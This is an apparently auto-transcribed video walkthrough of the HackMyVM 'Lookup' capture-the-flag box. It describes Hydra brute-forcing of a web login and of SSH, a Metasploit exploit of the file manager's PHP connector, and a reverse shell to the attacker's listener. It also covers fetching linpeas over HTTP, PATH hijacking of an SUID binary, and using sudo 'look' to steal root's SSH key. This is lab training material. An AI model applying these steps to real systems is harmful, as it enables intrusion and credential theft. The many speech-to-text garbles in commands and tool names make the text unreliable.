Yo, what's going on, guys? In this video, we're going to be doing Lookup from HackMyVm. This is box rated about solid medium. And yeah, let's get on to the video. As always, I'm starting by splitting my terminal serum, sorting a discover my SR 10.0.0.1/24/IT0 crap out for PCS. Doing this, we do get IP the box 10.0.20. So do and map my SSC for default scripts, my Z duration will scan out ports in the IP. Doing this, I'll do my Z verbose. We have a total of 2 ports open, port 80 open for HTTP, and also port 22 open for SSH. I'm sorry, visiting port 80. Doing this, we do get a lookup HMV. So I'm going to put this into my VNC/etc host file. I'll do this for 10.0.0.20 for lookup HMV. We'll take off the HTTP, go right quit. And now we do have that lookup HMV. So I'm going to refresh, do Control R. And here we do get a login and a username and password. So I'm just going to try like test, see what happens. And here we do get a wrong username and password. I think it does refresh every 3 seconds. It does redirect back to this, I believe it's going to be index.php, right? Yeah, it's going to be index.php. So we can actually start by trying like a SQL injection or maybe brute forcing for a user. But for now, let's start by running GoBuster, right? So do GoBuster dir mode of my instance to the IP address. We'll take off this index.php. We'll do -w/user share word list. We'll do GoBuster directory. Let's do with your medium.txt. We'll do extends to HTML, TXT, and also PHP. Looking back at that map scan, we have port 22 open for SSH. Is open SSH for Ubuntu. Also port 80 open for HTTP is running Apache for Ubuntu, right? So it doesn't seem like we have anything too much here, right? So we do have a login.php. I'm guessing it's going to be a brute force because most likely there's a redirect to login.php. So probably we can start by brute forcing using Hydra. So we do have a message which we do need to get. So I'm going to do test. I do want to get this message so we can actually get the username and password to actually check for Hydra to help us check if we do have a valid user or a valid password, right? I do want to also check if it tells me if there's a different within this, if it tells me if it's only wrong user or only like a wrong password, right? So start by doing that. So I'm going to run Hydra. We'll do Hydra -L for a user. I'm just do this for, we'll do test or random. I'll just do -L for, let's start by testing actually a user or a user using user share word list rockq.txt. We'll do -p. We'll do this like pass 1, 2, 3. I do believe we can do a lookup HMV for HTTP post form. You can do a HTTP post form. It's going to go to this login.php, which is valid. This login.php. From here, we can specify that this wrong username or password. But first, we can do a username is equal to, I'm going to have to send this within burp so we can actually see the parameters. Since this is redirecting, I need to see the parameters to make sure that this is correct. So I'm just going to do like test. We'll open, put this for proxy, go to proxy and go to proxy settings. We'll go to 10.0.175. And doing this, we can log in. We send it to repeater. And you see that username and password. So usually this can be any type of parameter, depends on what is running. But I like double checking instead of guessing because maybe this can be username, user or something. I'm not sure. Password or set password for the parameter. So in this case, it's just simple, just using a username and password. So we can just do that. So do username, we can specify user. So we're basically just copying what is in burp, do and password. And the same thing, we're going to tell Hydra to put this within the parameter for using this for pass under this pass, right? So do pass. And I believe we can specify Specify the wrong username and password. And it seems about right. Press enter on that. Let me do minus F, minus I, minus V. So it does stop on success. But before doing that, I just want to take off this minus V, just making sure that it does run. So we can just wait. We can just wait and see what we get. After a while, we do get a login for Jose and also for the pass for pass 123. That pass 123 is going to be set just a random pass for just anything you want. I just use it as a placeholder because Hydra does request a password. So we do know that Jose does work. Just to confirm, we can confirm this by just going to Jose and checking if the output is different when we do login. So we do login. And we do get this for wrong password now. So I'm just copy this for wrong password. We can change this instead of wrong username. We can change this to wrong password. This will differentiate that we do have a valid user. We already have valid users, but it's going to differentiate if we do have a valid password now. So do minus P. In this case, I'll do minus P for user share wordless rockyou.txt. We'll change the minus L to a lowercase l. So we can specify a user. So in this case, it's going to be for Jose. We can run this and see what we get. After a while, we do get a login for Jose and also for the password for password 123. We can confirm this. Just do Jose, password 123. And we are able to log in, but we do have a host name for files.lookup HMV. So same thing, I'm just going to be into my /etc hosts. I just like pressing tab and putting in the host name. It can be a subdomain, so we can refresh this. And the first thing I noticed that we do have a files for lfinder. I believe there's an exploit for this, so we can use. I'm going to search up lfinder for exploit. We do have a command injection for PHP connector. We have a remote code execution. We can also run like a Go Buster if we actually want to find the version. Let's see if we can look into like GitHub, any look into a GitHub, which just show a direct, it does seem like we have Metasploit, a direct walkthrough of this. We do have a Metasploit for this web app for lfinder PHP connector, which I'm guessing is the same one as this first one here, PHP connector. So let's see if we can use that PHP connector for Metasploit, this module here. So I'm going to copy this. I'll open this for MSF console. And let's see what else they're doing. So they just set the remote host for the IP, the target URI, which is going to be for the path of where this is found. In this case, this will be under lfinder. There's no version on here, but if this doesn't work, we maybe specify, we can maybe run a Go Buster to find the version under this lfinder, right? They set the verbose to true just to see more output, and they run check, and they just run this module, right? So let's start by doing that. So we do have Metasploit. I'm gonna go to show options. We do have the target URL for lfinder. We can set the remote host for 10.0.0.20. We should probably set the host name since it's under files. So I believe it was file lookup HMV. We can run that check command to check if it's vulnerable. Let's show options. Do we have this right? Files. It's gonna be under files. We can run that check. Let's run this. See if that works. This seemed like we could get a interpreter session open. So we can run a sysinfo, and we are under the computer for lookup, and of course this is going to be for Linux. I can just run a shell, we can do ID, and now we're under www data. So I'm going to export my term is equal to xterm. We do ID, it can run like a bash minus I. And I'm going to start by getting a reverse shell, so I'm going to go to pen test monkey. We'll go into temp. This is a pretty rare shell that not many people use, but we can use this, right? Let me just delete this since we can't edit throughout the command line. So do 10.0.0.175, do some port 9001. Do Control-Shift-O. So do all wrap, HackMyVm on 9001. We can run this on here. We do connect, we do ID, we do bash -i. I'll just export my term. I don't have this in my command line history. We do ID and now under www data. So I'll do else -la. I'll start doing some enumeration under here. We do have doesn't seem like we do anything under here. I'm gonna go under /var, go into anything we have, check if we do have anything under backups. I think under here, go into www. We do have this file lookup HMV. HTML. Yeah, nothing under here. I guess we can't, oh yeah, we can't CD into there. We have a public HTML. Public _ HTML. We have lfinder. I guess it's just going to be the document root for lfinder. We did get permission denied. So I'm going to check under home. We do have a user as think. We do have a CD. Let's try CD into .sh. We do have the user.txt. And we do have a .passwords here. And we do get permission denied for that as well. So I'm going to CD into /dev/shm. I do want to get the file for, I believe I do have it under /root. You have under documents. I'm going to privilege escalation. It is for linpiece. And we have our linpiece.sh. So I'll do Python 3 -m http.server import 8081. So wget http 10.0.0.175 on port 8081 for linpiece.sh. We'll do chmod +x for linpiece.sh. You can run that linpiece. I'm going to output this to like a file.txt. So we can just let this run and see what we get. After a while, we do get our output for file.txt. So I'm just going to more into this file.txt. Let me just go back to so I'm gonna run the shell one more time. I'm gonna go back to Firefox, copy this. I do want to get a shell. We'll do just do a bash -i. We'll export the term. We'll say into /dev/shm. I am going to start a Python 3 server, so I'll do Python 3 -m http.server import 8081 for this linpiece.sh. I believe we have the IP for 10.0.0.20. We'll just go under here. We'll do mkdir for linpiece, cd into linpiece, wget http for 10.0.0.20 import 8081 for linpiece.sh. Or in this case, file.txt actually. I'm just going to more into file.txt. So right now I'm just looking for anything that's going to be in red. Maybe we can start looking at services or anything that is in the box. So do you have unmounted file system? We don't have anything under here. Permissions, cron jobs, services. We have the IP of the box. We have all users. We have user as think and also as root. So we have SUID. We do have a couple of these here. These all look normal. We do have @. I believe we do have a binary for @. I do want to check for GTFO bins. So I'll just go to GTFO bins. We do have this. Maybe we can run SUID for @. And we only do have shell, command, and sudo, so it's not going to be that. Another one that looks pretty interesting is going to be PWM. Let's go back and check for PWM. And we don't have a binary for PWM, right? I do want to check for this PWM. We don't have anything else. We do have PKEXEC, we have password file, sudo, CHFN, which none of these are going to be for SUID, right? So looking back, let's go back into, I'm just going to exit out this, run the shell one more time. I want to keep this into within my text editor for user sbin PWN. Also want to keep this reverse shell as well. Just going to copy this reverse shell, put this in here. So I'll wrap one more time, start with listener. I'll do bash -i. I'll do export the term. Now clear terminals. So look into this. I just want to do else mysla under, we don't have the right, we don't have this copy. Do else mysla under user sbin PWM. See what this is. Also want to run a file command. So this is SUID binary since we do have the S here. And we do have this as just set UID. So it is indeed a set UID. So I'm clear my terminals here. I just want to run this, see what we get. So reading this carefully, we do have a running ID command to extract the username and also the user ID. And also it's running the ID command for www data and also inputting that user for home www data for the passwords not found. So it is basically just using the cat command for just inputting what is under the ID when it does run the ID command, and then putting that ID command into the user for home www data. In this case, this is just a user for Apache. We don't have a valid home directory under home, right? So we do else mysla /home should not exist, and it doesn't exist, right? So we do have home www data, passwords not found. If we do else mysla /home think, we should have a .passwords. So let's see if we can manipulate the ID command, which we can specify a path to actually visit our own ID command. So we clear my terminals here. We do have we can do this under /dev/shm under /temp. I'll just do this under dev/shm. So I just want to do a echo command for, well, let's first run the ID command because we need to get the output for, think. So I do think. Any user on the machine can run ID command for root. So I just do this for root. I'll get the same thing for root. So I'm going to copy the user ID, the GID, and also the groups. What I want this to happen, since it is checking for the output, I do want to echo this into, we'll go into /dev/shm for ID. So now if I export my path is equal to /dev/shm, we'll do this for semicolon for path. If I echo $path, if I echo my path, you'll see this, we have the first path. So when it does run, when a command is ran, it's checking to the path to see which one's first. Since we did specify since we did export it, the path from dev/shm, it is put first. So it's going to check under /dev/shm. So if I do ID, you'll see that we do have the command for www data. Let's see if we can make this executable. So we'll do chmod +x for ID. We'll do chmod 777 for ID. Let's run this ID command. I guess if we do cat out like /etc password, we'll be able to see the output for this ID command. Let me cat this ID, or let's cat this ID. We do have this for ID. Let's go back into user bin PWM. Let's go run this. And we do get a unvalid syntax for echo. This is due to echo we need to do a double echo for this parentheses to work. So it is running. Even though we run ID, it's not running within this, but since this is SUID, it is running under my path. So I'm gonna echo We'll just do echo for let's do the ID command again. So I'm gonna cat this ID. We'll echo for think. So we gotta do double echo. So we can just echo this on the screen. And we'll do this for /dev shm for, we'll do this for ID. It's gonna overwrite that file, cat the ID command. And now it is under think. So I just set this for chmod 777 and also set this to executable for the ID command. So if we run that one more time, it doesn't seem to be working. Error setting the ID command. Let's cat the ID. I guess we did that wrong. Let's put this one more time. We didn't specify let's specify the two parentheses, or that's two quotations for this. So we can echo, and then we can echo this again for think. So we're going to echo this twice. So we're going to echo this within the ID, but since we do have a syntax error, we do want to echo this again, but making sure it only echoes this, right? So cat the ID command, just to ensure that we do have the command, we do have echo, and then it's going to echo this. So when the command is run for user bin pwm, we're going to make sure it's going to echo this when to run the ID command, and then ensure us that we can run that command. So doing this, I did cat out that .passwords. So it did make sure that think, so we did run ID think. It did ensure that this was the output since we did echo on the screen. And PWM does check that all this checking is think is in, it's not really checking if the ID command is being run, but it's checking if think is actually an output within the command, right? In this case, we manipulate for that to work. So let me just copy this one more time, show you that we do have this copied. So I'm going to go into CD media root backup. We'll go to HackMyVm for lookup. I'll make a directory for pass, CD into pass, my VI into pass.txt. Put that in there. Now we can run, we did have port 22 open for SSH. So we'll do hydra -l for think. We'll do -p for password. We'll do SSH 10.0.0.20 on port 22. We'll do -i, sort of session. And here we do get a valid login for think and also this password. So I can just SSH into think at 10.0.0.20. We do ID, and now we're under think. So I'm going to start running a sudo mycel. We do have a password for think. We do have a user bin look. We do have this for GTPO bins. We can do this for look, SUID. Or we can just run this for sudo as well. We can check the file. So we can read a file from a variable. We'll set this to /root. We'll do this for /root.ssh, ID_RSA. We want to get the private key for root. And we can just run sudo for look. Sudo -u, we'll just run for root for user bin /look. User bin, make sure if I do have this copied right. So we'll do sudo -u for root for user bin look. Now we do have the private key for root. So anytime you do installation for SSH, we should have this open for port 22 locally. So we do have a port 22 open locally. Let me put this into ID_RSA. So we right quit, cat this ID_RSA. We have the private key for root. So do SSH its root at 10.0.0.20. We'll do -i for ID_RSA. We should get a permission denied for the permissions. So do chmod 700 for ID_RSA. We do yes. We can do ID, now we're under root, so we can do alice-a and cat our root.txt. Well guys, pretty much in the video. Don't forget to like and subscribe, and I'll catch you guys in the next one.